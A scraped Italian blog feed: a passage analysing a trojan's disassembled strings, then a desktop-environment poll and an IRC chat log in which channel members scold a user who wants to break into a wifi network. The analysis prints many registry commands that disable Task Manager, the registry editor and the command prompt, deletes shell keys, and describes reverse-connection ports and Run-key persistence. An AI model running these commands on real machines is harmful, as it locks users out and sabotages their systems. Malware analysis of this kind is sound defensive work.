t3c4i3's.00413F38 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Pol</program><program>icies\Explorer /v NoActiveDesktop /t reg_dword /d 1 /f\n<br />00404A5B PUSH t3c4i3's.00413FAC reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoActiveDesktopChanges /t reg_dword /d 1 /f\n<br />00404A6C PUSH t3c4i3's.00414028 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoInternetIcon /t reg_dword /d 1 /f\n<br />00404A7D </program><program>PUSH t3c4i3's.0041409C reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFavouritesMenu /t reg_dword /d 1 /f\n<br />00404A8E PUSH t3c4i3's.00414110 reg add HKCU\Software\Microsoft\Windows\CurrentVersi</program><program>on\Policies\Explorer /v NoChangeStartMenu /t reg_dword /d 1 /f\n<br />00404A9F PUSH t3c4i3's.00414184 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFolderOptions /t reg_dword /d 1 /f\n<br />00404AB0 PUSH t3c4i3's.004141F8 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v ClearRecentDocsOnExit /t reg_dword /d 1 /f\n<br />00404AC1 PUSH</program><program> t3c4i3's.00414270 reg add HKCU\Software\Microsoft\Windows\CurrentVersio</program><program>n\Policies\Explorer /v NoLogOff /t reg_dword /d 1 /f\n<br />00404AD2 PUSH t3c4i3's.004142DC reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoTrayContextMenu /t reg_dword /d 1 /f\n<br />00404AE3 </program><program>PUSH t3c4i3's.00414350 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuSubFolders /t reg_dword /d 1 /f\n</program><br /><program>00404AF4 PUSH t3c4i3's.004143C8 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoWindowsUpdate /t reg_dword /d 1 /f\n<br />00404B05 PUSH t3c4i3's.0041443C reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoViewContextMenu /t reg_dword /d 1 /f\n<br />00404B16 PUSH t3c4i3's.004144B0 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDriveAutoRun /t reg_dword /d 1 /f\n<br />00404B27 PUS</program><program>H t3c4i3's.00414524 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartBanner /t reg_dword /d 1 /f\n<br />00404B38 PU</program><program>SH t3c4i3's.00414594 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSetActiveDesktop /t reg_dword /d 1 /f\n<br />00404B49 PUSH t3c4i3's.0041460C reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetConnectDisconnect /t reg_dword /d 1 /f\n<br />00404B5A PUSH t3c4i3's.00414688 reg add HKCU\Software\Microsoft\Windows\CurrentVers</program><program>ion\Policies\System /v NoDispCPL /t reg_dword /d 1 /f\n<br />00404B6B PUSH t3c4i3's.004146F4 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispBackgroundPage /t reg_dword /d 1 /f\n<br />00404B7C PU</program><program>SH t3c4i3's.0041476C reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispScrSavPage /t reg_dword /d 1 /f\n<br />00404B8D PUSH t3c4i3's.004147E0 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispAppearancePage /t reg_dword /d 1 /f\n<br />00404B9E PUSH t3c4i3's.00414858 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispSettingPage /t reg_dword /d 1 /f\n<br />00404BAF PUS</program><program>H t3c4i3's.004148CC reg add HKCU\Software\Microsoft\Windows\CurrentVersi</program><program>on\Policies\System /v NoSecCPL /t reg_dword /d 1 /f\n<br />00404BC0 PUSH t3c4i3's.00414938 reg add HKCU\Software\Microsoft\Windows\CurrentVe</program><program>rsion\Policies\System /v NoPwdPage /t reg_dword /d 1 /f\n<br />00404BD1 PUSH t3c4i3's.004149A4 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoAdminPage /t reg_dword /d 1 /f\n<br />00404BE2 PUSH t3c4i3's.00414A10 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoProfilePage /t reg_dword /d 1 /f\n<br />00404BF3 PUSH</program><program> t3c4i3's.00414A80 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDevMgrPage /t reg_dword /d 1 /f\n<br />00404C04 PUSH t3c4i3's.00414AF0 reg add HKCU\Software\Microsoft\Windows\CurrentVersion</program><program>\Policies\System /v NoConfigPage /t reg_dword /d 1 /f\n<br />00404C15 PUSH t3c4i3's.00414B60 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoFileSysPage /t reg_dword /d 1 /f\n<br />00404C26 PU</program><program>SH t3c4i3's.00414BD0 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoVirtMemPage /t reg_dword /d 1 /f\n<br />00404C37 PUSH t3c4i3's.00414C40 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t reg_dword /d 1 /f\n<br />00404C48 PUSH t3c4i3's.00414CB0 reg add HKCU\Software\Microsoft\Windows\CurrentVersio</program><program>n\Policies\System /v DisableLockWorkstation /t reg_dword /d 1 /f\n<br />00404C59 PUSH t3c4i3's.00414D28 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t reg_dword /d 1 /f\n<br />00404C6A PUSH t3c4i3's.00414DA0 reg add HKCU\Software\Microsoft\Windows\CurrentVers</program><program>ion\Policies\System /v DisableRegistryTools /t reg_dword /d 1 /f\n<br />00404C7B PUSH t3c4i3's.00414E18 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Network /v NoNetSetup /t reg_dword /d 1 /f\n<br />00404C8C PUS</program><program>H t3c4i3's.00414E84 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Network /v NoNetSetupIDPage /t reg_dword /d 1 /f\n<br />00404C9D PUSH t3c4i3's.00414EF8 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Network /v NoNetSetupSecurityPage /t reg_dword /d 1 /f\n<br />00404CAE PUSH t3c4i3's.00414F70 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Network /v NoFileSharingControl /t reg_dword /d 1 /f\n<br />00404CBF PUSH </program><program>t3c4i3's.00414FE8 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Network /v NoPrintSharing /t reg_dword /d 1 /f\n<br />00404CD0 PUSH t3c4i3's.00415058 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp /v Disabled /t reg_dword /d 1 /f\n<br />00404CE1 PUSH t3c4i3's.004150C4 reg add HKCU\Software\Microsoft\Windows\CurrentVersio</program><program>n\Policies\WinOldApp /v NoRealMode /t reg_dword /d 1 /f\n<br /><br />Può anche cancellare questi file di registro<br />00404CF7 PUSH</program><program> t3c4i3's.00415134 reg delete HKCR\Directory\Shell\Find /f\n<br />00404D08 PUSH t3c4i3's.00415160 reg delete HKCR\Folder\Shell\Explore /f\n<br />00404D19 PUSH t3c4i3's.0041518C reg delete HKCR\Folder\Shell\Open /f\n<br /><br />Queste sono opzioni personalizzate non è detto che siano tutte attive nel server<br /><br />00404E2D PUSH t3c4i3's.0041520C Prank Upload<br />00404EE3 PU</program><program>SH t3c4i3's.0041521C 7 . Closing Applications\n<br />00404EF0 PUSH t3c4i3's.00415238 - closes Msnmsgr.exe, Explorer.exe, Iexplore.exe, Wmplayer.exe\n\n<br />00404EFD </program><program>PUSH t3c4i3's.00415280 8 . Open CD Tray\n<br />00404F0A PUSH t3c4i3's.00415294 - works only for certain pc\n\n<br />00404F17 PUSH t3c4i3's.004152B8 10 . Shutdown Started\n<br />00404F24 PUSH t3c4i3's.004152D0 - shutdown pc immediately\n<br />00404F31 PUSH t3c4i3's.004152F4 41 . Disable Keyboard\n<br />00404F3E PUSH t3c4i3's.0041530C - uses registry to remove keyboard\n\n<br />00404F4B</program><program> PUSH t3c4i3's.00415338 42 . Disable Mouse\n<br />00404F58</program><program> PUSH t3c4i3's.00415350 - uses registry to remove mouse\n\n<br />00404F65 PUSH t3c4i3's.00415378 43 . Disable Task Manager\n<br />00404F72 PUSH t3c4i3's.00415394 - uses registry to block task manager\n<br />00404F7F PUSH t3c4i3's.004153C4 44 . Disable Registry Editor\n<br />00404F8C PUSH t3c4i3's.004153E4 - uses registry to block registry[lol]\n\n<br />00404F99 PUSH t3c4i3's.00415414 45 . Disable Command Prompt\n<br />00404FA6 PUSH t3c4i3's.00415434 - uses registry to block command prompt\n<br />00404FB3 PUSH t3c4i3's.00415464 46 . Hide Control Panel Applets\n<br />00404FC0 PUSH t3c4i3's.00415488 - uses registry\n\n<br />00404FCD PUSH t3c4i3's.004154A0 47 . Restrict Features\n<br />00404FDA PUSH t3c4i3's.004154BC - uses registry\n<br />00404FE7 PUSH t3c4i3's.004154D4 - includes Code 44.\n<br />00404FF4 PUSH t3c4i3's.004154F0 - includes Code 45.\n\n<br />00405001 PUSH t3c4i3's.0041550C 48 . Delete Open, Explore &amp; Find\n<br />0040500E PUSH t3c4i3's.00415530 - uses registry\n\n<br />0040501B PUSH t3c4i3's.00415548 71 . Consume Harddisk\n<br />00405028 PUSH t3c4i3's.00415560 - eats up all the space in the default harddisk\n\n<br />00405035 PUSH t3c4i3's.00415598 \n<br /><br /><br />Questo Trojan anche se sembra molto old style ha funzioni innovative come l'utilizzo dei bot in massa e la reverse connection.<br />Tanto tempo fa quando ancora non si usavano tanto i router c'era l idea di mandare una lista di server disponibili su un sito in php o mandando un segnale alla tua macchina e apparendo su una finistrella del client dopo aver avuto la lista dei server disponibili bisognava connettersi a essi e alcuni dopo un pò cominciavano a dare problemi sopratutto se erano messi dietro a un router...<br />Per questo ora si usa la reverse connection il client non si connette più al server ma il server che si connette al client e attravverso a esso si possono mandare svariati comandi.<br /><br />Per esempio questo trojan manda un pacchetto dalla porta 1984 (impostata sempre da me)<br /><br />00000000 | 434F 4D50 5554 4552 4E41 4D45 | COMPUTERNAME<br /><br />cercando di connettersi a un client...<br /><br />Apre anche una porta per spedire immagini e/o file la 1033 (questa impostata di default)<br /><br />crea una voce di registro in<br /></program>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]<br />inserendo la locazione del trojan nel vostro pc per auto avviarsi ogni volta che accendete il computer<br /><br />[HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion]<br />Text = "1254680584"<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2454834713612225354-1061083668479387655?l=drunkgeisha.blogspot.com' alt='' /></div>aliceinwirehttp://www.blogger.com/profile/11563492458763239689noreply@blogger.comtag:blogger.com,1999:blog-2454834713612225354.post-20074693046040211752009-10-03T08:25:00.000-07:002009-10-03T12:37:58.720-07:00<a href="http://www.gnome.org/" class="image" title="GNOME logo"><img alt="GNOME logo" src="http://upload.wikimedia.org/wikipedia/commons/thumb/6/68/Gnomelogo.svg/125px-Gnomelogo.svg.png" height="152" width="125" /></a><br /><br /><table style="border: 0px none ; margin: 0px; padding: 0px; width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="answerText"><div title="Gnome">Gnome</div></td> <td style="margin-top: 2px; padding-top: 2px;"><div style="position: relative; z-index: 0;"><div class="resultText" title="Gnome"> 36 (55%)</div> <div class="resultBar" title="Gnome" style="position: absolute; left: 0px; top: 0px; z-index: -1; width: 55%;"> </div></div></td></tr> <tr><td class="answerText"><div title="Kde">Kde</div></td> <td style="margin-top: 2px; padding-top: 2px;"><div style="position: relative; z-index: 0;"><div class="resultText" title="Kde"> 24 (36%)</div> <div class="resultBar" title="Kde" style="position: absolute; left: 0px; top: 0px; z-index: -1; width: 36%;"> </div></div></td></tr> <tr><td class="answerText"><div title="Lxde">Lxde</div></td> <td style="margin-top: 2px; padding-top: 2px;"><div style="position: relative; z-index: 0;"><div class="resultText" title="Lxde"> 8 (12%)</div> <div class="resultBar" title="Lxde" style="position: absolute; left: 0px; top: 0px; z-index: -1; width: 12%;"> </div></div></td></tr> <tr><td class="answerText"><div title="Xfce">Xfce</div></td> <td style="margin-top: 2px; padding-top: 2px;"><div style="position: relative; z-index: 0;"><div class="resultText" title="Xfce"> 5 (7%)</div> <div class="resultBar" title="Xfce" style="position: absolute; left: 0px; top: 0px; z-index: -1; width: 7%;"> </div></div></td></tr> <tr><td class="answerText"><div title="EDE">EDE</div></td> <td style="margin-top: 2px; padding-top: 2px;"><div style="position: relative; z-index: 0;"><div class="resultText" title="EDE"> 0 (0%)</div> </div></td></tr> <tr><td class="answerText"><div title="Étoilé">Étoilé</div></td> <td style="margin-top: 2px; padding-top: 2px;"><div style="position: relative; z-index: 0;"><div class="resultText" title="Étoilé"> 1 (1%)</div> <div class="resultBar" title="Étoilé" style="position: absolute; left: 0px; top: 0px; z-index: -1; width: 1%;"> </div></div></td></tr> <tr><td class="answerText"><div title="IRIX Interactive Desktop">IRIX Interactive Desktop</div></td> <td style="margin-top: 2px; padding-top: 2px;"><div style="position: relative; z-index: 0;"><div class="resultText" title="IRIX Interactive Desktop"> 0 (0%)</div> </div></td></tr> <tr><td class="answerText"><div title="Mezzo">Mezzo</div></td> <td style="margin-top: 2px; padding-top: 2px;"><div style="position: relative; z-index: 0;"><div class="resultText" title="Mezzo"> 1 (1%)</div> <div class="resultBar" title="Mezzo" style="position: absolute; left: 0px; top: 0px; z-index: -1; width: 1%;"> </div></div></td></tr> <tr><td class="answerText"><div title="ROX">ROX</div></td> <td style="margin-top: 2px; padding-top: 2px;"><div style="position: relative; z-index: 0;"><div class="resultText" title="ROX"> 0 (0%)</div> </div></td></tr></tbody></table>Total: 65<br />Tempo: 30 giorni<br /><br /><br />Ero un pò scettica sulla vincità di Gnome ma ubuntu sicuramente ha fatto salire le statistiche essendo predisposto per Gnome, mentre Backtrack è ancora fedele a KDE.<br />Quindi un grosso applauso per Gnome !<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2454834713612225354-2007469304604021175?l=drunkgeisha.blogspot.com' alt='' /></div>aliceinwirehttp://www.blogger.com/profile/11563492458763239689noreply@blogger.comtag:blogger.com,1999:blog-2454834713612225354.post-15637477931062082712009-10-02T08:34:00.000-07:002009-10-02T08:44:25.506-07:00ee GOLDMAN [n=IDIDSIID@net-93-65-104-172.cust.dsl.vodafone.it] has joined #backtrack.it<br />14:20 GOLDMAN buongiorno a tutti<br />14:22 GOLDMAN ragazzi qualcuno di vuoi sa di wifislax ????????<br />14:25 GOLDMAN nessuna risposta x mi ??<br />14:25 BtSmarto no scusaci GOLDMAN<br />14:25 BtSmarto non conosco<br />14:26 @keeley ke risposta vuoi GOLDMAN<br />14:26 @keeley sulla fine dell'universo? sugli alieni?<br />14:26 @keeley sulle password per entrare da emgent...<br />14:26 @keeley cosa vuoi?<br />14:27 GOLDMAN xk ho una problima con questo live cd . pero fa niente grazie cmq<br />14:27 @keeley quale live cd?<br />14:27 BtSmarto ma noi qui supportimao bt4<br />14:27 +dr4kk4r GOLDMAN: ke problema ?<br />14:28 BtSmarto wifislax<br />14:28 @keeley ancora con ste cose da lamer.. wifislax<br />14:28 +dr4kk4r keeley: hahahaahahah<br />ee m7x [n=m7x@unaffiliated/m7x] has joined #backtrack.it<br />14:29 ee mode/#backtrack.it [+v m7x] by ChanServ<br />14:29 GOLDMAN non accetta la mia scheda di wifi<br />14:30 @keeley ho capito, ma noi forniamo supporto qui per bt... vai sul canale di wifislax... ma sarei più curioso per cosa ci devi fare????<br />14:32 @keeley dai su GOLDMAN narraci cosa vuoi farci con wifislax..<br />14:35 ee Kerd [n=no@unaffiliated/kerd] has joined #backtrack.it<br />14:41 watakushi burp<br />14:50 GOLDMAN voglio hackerare un rete wifi<br />14:51 @keeley allora sei un cretino!<br />14:51 BtSmarto ahahahhaha<br />14:51 @keeley è meglio che tene vai di qui con queste intenzioni..<br />14:51 BtSmarto avessi detto un test<br />14:51 @keeley noi nn supportiamo atti criminali<br />14:51 GOLDMAN ma che dici<br />14:51 @keeley cosa?<br />14:52 BtSmarto dice bene GOLDMAN<br />14:52 ee aliceinwire [n=aliceinw@unaffiliated/aliceinwire] has joined #backtrack.it<br />14:52 BtSmarto cioe keeley dice bene<br />14:52 BtSmarto magari è del vicino<br />14:53 GOLDMAN io fascio di test x le rete wifi e informo le agente come si fa a chiudere exploit<br />14:53 @keeley la legge nn dice questo<br />14:53 ee m7x [n=m7x@unaffiliated/m7x] has left #backtrack.it ["byeZzZ"]<br />14:53 @keeley non si sfonda la porta di casa degli altri e poi gli si dice cambiala<br />14:53 ee m7x [n=m7x@unaffiliated/m7x] has joined #backtrack.it<br />14:53 ee mode/#backtrack.it [+v m7x] by ChanServ<br />14:53 GOLDMAN che cosa dici la legger<br />14:53 @keeley dice ceh devi essere autorizzato dal proprietario<br />14:54 @keeley prima ovviamente.. che uno lo fa...<br />14:54 GOLDMAN scusati io non sono italiano non so niente di la legger italiana<br />14:54 @keeley la legge è così in tutta europa<br />14:54 @keeley e nella maggior parte del mondo.. solo in kuwait non è così<br />14:55 @keeley però strano dici che nn sei italiano però ti conetti dall'italia... quindi devi rispettare la normativa italiana<br />14:55 @keeley non è che se uno va un altro paese fa come gli pare.. perchè vieni da un altro<br />14:56 GOLDMAN non ho fatte nessun male fino adesso<br />14:56 BtSmarto ti conviene<br />14:56 @keeley non vuol dire niente<br />14:57 @keeley avere l'idea è il problema<br />14:57 @keeley anceh chi detiene armi non fa niente di male...<br />14:57 GOLDMAN sto qui con vuoi x cambiarla<br />14:57 @keeley e poi dice di volerle usare per uccidere le persoen<br />14:57 @keeley cosa vuoi cambiare?<br />14:57 GOLDMAN la mia idea<br />14:58 @keeley bene ora lo sai<br />15:01 GOLDMAN si avete bisogno di qualche informazione sono qui<br />15:01 @keeley e che informazioni dai GOLDMAN ?<br />15:02 GOLDMAN di pentesting<br />15:02 aliceinwire giusto GOLDMAN non andare in giro a fare casino nelle rete<br />15:02 aliceinwire reti<br />15:03 aliceinwire qua siamo tutti professionali<br />15:03 aliceinwire infatti la legge dice che devi avvisarli 1 mese prima se non sbaglio<br />15:04 aliceinwire l 'ethical hacker dovrebbe fare cosi no ?<br />15:04 BtSmarto yep<br />15:04 GOLDMAN io ho gia testato di ethical hacker<br />15:04 @keeley e chi telo ha rilasciato GOLDMAN ?<br />15:05 aliceinwire l ho sentito dire nei video dei cat !<br />15:05 GOLDMAN lo ho fatto in francia<br />15:05 aliceinwire in francia non vale<br />15:05 @keeley e chi telo ha rilasciato?<br />15:05 aliceinwire io ho l attestato di pentesting l ho fatto in etiopia<br />15:06 Kerd ma ci sono attestati di ethical hacker ?<br />15:06 @keeley qui abbiamo esponenti francesi...<br />15:06 @keeley si Kerd<br />15:06 @keeley a livello internazionale ci sono<br />15:06 aliceinwire si Kerd<br />15:06 BtSmarto a me l'hanno fatto a palermo ... e a napoli<br />15:06 Kerd chi rilascia questi attestati ?<br />15:06 aliceinwire ci stanno quelli della mediaservice.net in italia<br />15:06 GOLDMAN xk in francia non vale<br />15:06 aliceinwire vai a farci in salto kerd<br />15:06 GOLDMAN che te ha detto<br />15:06 aliceinwire io voglio prendermene qualcuno appena ho soldi<br />15:07 ee R00T_ATI [n=ihteam_n@93-41-147-96.ip82.fastwebnet.it] has joined #backtrack.it<br />15:07 aliceinwire dicci il nome del certificato che hai GOLDMAN<br />15:07 @keeley su vogliamo un nome... basta che lo leggi sul certificato... :D<br />15:08 @keeley si chiama ethical lamer?<br />15:08 aliceinwire ahahah<br />15:08 BtSmarto mandatemelo giù in sicilia lo faccio confessare.<br />15:08 BtSmarto hai capitooo<br />15:08 @keeley quello celo hanno intanti che sono venuti qui ma sono andati via..<br />15:08 BtSmarto XD hahahaaha<br />15:08 aliceinwire OEL = Open Ethical Lamer<br />15:08 GOLDMAN ho pagatto 2500 Certified Ethical Hacker<br />15:08 Kerd si paga per questi attestati ?<br />15:08 aliceinwire si Kerd<br />15:08 BtSmarto porco<br />15:08 GOLDMAN si costa tanto<br />15:08 BtSmarto certo che si paga<br />15:08 Kerd ma lol<br />15:08 aliceinwire se fai il corso e poi il test perchè non sai un cazzo<br />15:09 aliceinwire paghi come GOLDMAN una sacco di euro<br />15:09 aliceinwire ma se lo fai da privatista paghi molto meno<br />15:09 Kerd non m'interessa :)<br />15:09 @keeley fai solo l'esame.. ma devi saperlo fare :D<br />15:09 Kerd con 2500 euro mi prendo un nuovo pc :)<br />15:09 aliceinwire sulle 250€ per quelli semplici<br />15:09 @keeley tanto è vero che il materiale di studio telo danno... gratis<br />15:09 aliceinwire e 500€ per quelli più importanti<br />15:10 aliceinwire si ma servono per dimostrare che conosci tutte le merde di leggi<br />15:10 @keeley 250 servono giusto per non essere lamer :D<br />15:10 Kerd ma poi valgono qualcosa questi attestati nel mondo lavorativo ?<br />15:10 @keeley si<br />15:10 @keeley se vai con ditte che si occupano nel mondo della sicurezza si<br />15:10 @keeley se vai in una ditta che fa tutt'altro certo non gli frega niente al datore di lavoro..<br />15:11 BtSmarto ragazzi vado dal falegname<br />15:11 @keeley è come dire hai l'attestato e vai dal falegname quello ti dice... ci faccio la cornice?<br />15:11 GOLDMAN si tanto io lavoro adesso con 12 aziendi della sicurezza in marocco e arab saudit e dubai<br />15:11 BtSmarto mi vado a fare un case traforato in noce massello<br />15:11 @keeley facci i nomi :D<br />15:11 GOLDMAN sono privacy<br />15:12 aliceinwire GOLDMAN, sei andato a letto con berlusconi ?<br />15:12 @keeley se lavori con loro nella sicurezza dovresti ben sapere che bisogna essere autorizzato per fare i test.. e fino a dove...<br />15:12 @keeley e poi nn ci hai detto il nome della certificazione...<br />15:12 @keeley chi tela ha fatta???<br />15:13 GOLDMAN ho fatto cosi con vuoi solo per farmi entrari in discorso con vuoi<br />15:13 BtSmarto allora sei pirla<br />15:13 fiox lol<br />15:14 GOLDMAN grazie vedi sei un male educato<br />15:14 @keeley questo è come farsi inculare, perdere credibilità all'istante<br />15:14 BtSmarto no perchè non c'è bisogno di sparare cazzate<br />15:14 BtSmarto x conversare con noi<br />15:15 GOLDMAN lo so ma non so nessuno con vuoi<br />15:15 @keeley ma tu pensi che noi siamo coglioni e crediamo a tutto quello che uno dice?<br />15:15 aliceinwire "male educato" ahahahahahahahahahahah<br />15:15 BtSmarto si sono un porco schifoso<br />15:16 BtSmarto ma mica coglione<br />15:16 GOLDMAN grazie<br />15:16 ee R00T_ATI_Portati [n=ihteam@93-41-147-96.ip82.fastwebnet.it] has quit [Read error: 60 (Operation timed out)]<br />15:16 GOLDMAN di tutto<br />15:16 BtSmarto ma che de che<br />15:17 GOLDMAN non pensavo che vuoi italiani cosi<br />15:17 BtSmarto noi se tu hai bisogno di aiuto siamo disposti a dartelo<br />15:17 BtSmarto ma se ci racconti cose non credibili c facciamo solo due risate<br />15:18 GOLDMAN ok quanti cifri ci sono in md5<br />15:18 GOLDMAN hhhhhhhhhhhhhhhhh<br />15:18 GOLDMAN nessuno sa ???<br />15:19 BtSmarto aspe stiamo contando<br />15:19 GOLDMAN in google hhhhhhhhhhhhhhhhhhhhhh<br />15:21 @keeley GOLDMAN: quanti anni hai?<br />15:21 GOLDMAN 19 anni<br />15:21 @keeley e pure dalla linea mobile ci sei venuto qui XD<br />15:22 GOLDMAN non ho capito ?? scusa nessuno rispondi alla mia domanda<br />15:22 BtSmarto GOLDMAN di dove sei?<br />15:23 ee crossobowerro [n=geek@host136-183-dynamic.12-79-r.retail.telecomitalia.it] has joined #backtrack.it<br />15:23 crossobowerro Hohoho, sono entrato<br />15:23 BtSmarto ciao cross<br />15:23 BtSmarto finalmente<br />15:23 @keeley ma che domanda fai GOLDMAN ?<br />15:23 GOLDMAN sono dal marocco<br />15:23 crossobowerro cosa bisogna fare per entrare<br />15:23 ee aliceinwire [n=aliceinw@unaffiliated/aliceinwire] has quit ["Ex-Chat"]<br />15:23 ee Pat613 [n=aaa@dynamic-adsl-94-38-34-248.clienti.tiscali.it] has joined #backtrack.it<br />15:23 @keeley Pat613:<br />15:24 crossobowerro sono bannato in un modo strano, non riuscivo piu' ad entrare... :)<br />15:24 Pat613 ciao a tutti<br />15:24 crossobowerro ciao a tutti quanti, comunque<br />15:24 Pat613 ciao keeley<br />15:24 Pat613 ciao cross<br />15:24 Pat613 (posso abbraviare vè?)<br />15:24 ee crossobowerro is now known as crossbower<br />15:24 BtSmarto ciao Pat613<br />15:24 @keeley Pat613: invece è un hard hacker uno di quelli vecchio stampo.. :D<br />15:24 ee aliceinwire [n=aliceinw@host213-45-dynamic.45-79-r.retail.telecomitalia.it] has joined #backtrack.it<br />15:25 Pat613 ahuhua<br />15:25 Pat613 io sono per le cose fisiche...<br />15:25 Pat613 da remoto non c'è gusto<br />15:25 crossbower hai ragione Pat613!<br />15:25 @keeley ci manca jacdam<br />15:25 GOLDMAN non ti entra in testa ??<br />15:25 crossbower come te la cavi col lockpicking?<br />15:25 crossbower (Pat613)<br />15:25 @keeley ma cosa GOLDMAN su parla...<br />15:26 Pat613 francamente<br />15:26 Pat613 nn ho mai scassinato cose<br />15:26 Pat613 fin'ora le portel 'ho sempre trovate aperte<br />15:27 GOLDMAN io ho fatto una domanda e sei capaci di rispondere<br />15:27 crossbower e, be. Sei come nmap :)<br />15:27 @keeley che domanda???<br />15:27 GOLDMAN ??<br />15:27 Pat613 ehehe<br />15:27 crossbower che domanda?<br />15:27 @keeley quante cifre ha md5....<br />15:27 Pat613 si<br />15:27 @keeley ma sai almeno a che serve?<br />15:27 GOLDMAN quella<br />15:27 GOLDMAN ?<br />15:28 ee R00T_ATI_Portati [n=ihteam@93-41-147-96.ip82.fastwebnet.it] has joined #backtrack.it<br />15:28 GOLDMAN che server ??<br />15:28 @keeley sei tu che telo devi imparare..<br />15:28 @keeley e poi quale md5 parli?<br />15:28 GOLDMAN hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh<br />15:28 @keeley dipende da quanti bit ha..<br />15:29 @keeley mica cene è uno solo :D<br />15:29 crossbower 32 lettere<br />15:29 @keeley crossbower: banale...<br />15:29 crossbower quello incluso in linux :P<br />15:29 crossbower yep, infatti<br />15:29 GOLDMAN crossssssssssssssssssss sei l'unco che devo darlo un rispetto qui<br />15:29 crossbower ci vuole una domanda con profondi risvolti<br />15:29 GOLDMAN bravo<br />15:29 Pat613 devo ascppare<br />15:30 Pat613 a dopo gente<br />15:30 Pat613 ciao<br />15:30 crossbower ciao!<br />15:30 BtSmarto ciao<br />15:30 @keeley queste domandine da studentino appena entrato fanno ridere...<br />15:30 @keeley pià che altro impara ad usare google!<br />15:30 crossbower GOLDMAN, sei nuovo del chan? di cosa ti occupi?<br />15:31 GOLDMAN hhhhhhhhhhhhhhhhhhhhhh che non sa rispondere fa sempre cosi<br />15:31 BtSmarto de frottole<br />15:31 crossbower (certificazioni, referenze e various stuff...)<br />15:31 BtSmarto bye<br />15:31 GOLDMAN si cross sono nuovo e mi occupo di varie cosi<br />15:32 @keeley specifica varie...<br />15:32 @keeley ci interssa sempre quel varie a noi<br />15:32 GOLDMAN bene<br />15:32 aliceinwire GOLDMAN, io ti consiglio un ottimo tool<br />15:32 aliceinwire per fare hacking<br />15:32 aliceinwire netbus !<br />15:32 GOLDMAN scamming e spammer and pentesting e wardriving<br />15:33 @keeley scamming che roba è?<br />15:33 aliceinwire utile sopratutto per controllare reti<br />15:33 GOLDMAN non che roba che triva agente che non capici niente<br />15:34 aliceinwire scamming = fregare carte di credito<br />15:34 GOLDMAN alice sai installare msf in linux ??? dimmi solo commando<br />15:34 GOLDMAN si<br />15:34 @keeley se sei così furbo come ti sei dimostrato prima.. te freghi da solo :D<br />15:35 aliceinwire GOLDMAN, ricordati di usare il fat16 che altrimenti netbus da problemi<br />15:35 GOLDMAN rispondi alla mia domanda<br />15:35 GOLDMAN ??<br />15:36 @keeley metasploit?<br />15:36 GOLDMAN msf<br />15:36 aliceinwire framework<br />15:36 GOLDMAN non sai cosa<br />15:36 @keeley alice è una ricercatrice di framework<br />15:36 aliceinwire be è roba per bambini<br />15:36 @keeley ha scritto molti plugin<br />15:36 aliceinwire i plugin te li devi scrivere tu GOLDMAN<br />15:36 aliceinwire se usi troppo le cose degli altri poi diventi ceco<br />15:36 @keeley non gli dire la versione successiva che è meglio :D<br />15:37 @keeley ma nn erano le pippe?<br />15:37 aliceinwire cieco<br />15:37 GOLDMAN cross guarda ti lo giuro che nessuno di questi sa qualcosa<br />15:37 Spagn oddio non so usare dia, moriro'<br />15:37 aliceinwire si ma solo se usi il volatile di altri<br />15:37 crossbower GOLDMAN, tu come faresti a installare metasploit con un solo comando?<br />15:37 aliceinwire XD<br />15:38 crossbower qual'e' la risposta esatta?<br />15:40 crossbower ....<br />15:40 GOLDMAN xk il mio kernel lo modificato io con di tools e quando scarico qualcosa di internet fa unzip da solo e devo fare solo il commado di instalazioni<br />15:40 GOLDMAN scusa x ritardo<br />15:40 +m7x GOLDMAN, cosa fumi??<br />15:41 GOLDMAN no fumo<br />15:41 aliceinwire "l'ho" porco dio<br />15:41 aliceinwire litaliano<br />15:42 aliceinwire a forza di stare in questo chan sto imparando a bestemmiare almeno a qualcosa serve :)<br />15:42 GOLDMAN .............<br />15:42 @keeley no aliceinwire mo bestemmi pure tu :D<br />15:43 @keeley ma dicci GOLDMAN che OS usi?<br 